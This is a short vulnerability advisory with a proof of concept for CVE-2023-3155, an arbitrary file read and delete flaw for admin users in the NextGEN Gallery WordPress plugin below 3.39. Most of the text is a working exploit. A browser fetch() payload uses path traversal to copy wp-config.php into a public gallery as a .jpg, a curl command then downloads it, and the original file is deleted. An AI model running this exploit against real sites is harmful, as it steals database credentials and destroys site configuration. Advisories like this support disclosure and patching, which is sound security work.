NextGEN Gallery < 3.39 – Admin+ Arbitrary File Read and Delete | CVE 2023-3155

Description

The plugin is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.

Proof of Concept

1. Create a Gallery called "My Gallery" and note its ID.
2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"../wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
    "method": "POST",
    "mode": "cors"
})).text();


3. Download the file contents with the following `curl` command:

curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg


4. Note that the `wp-config.php` file has been deleted.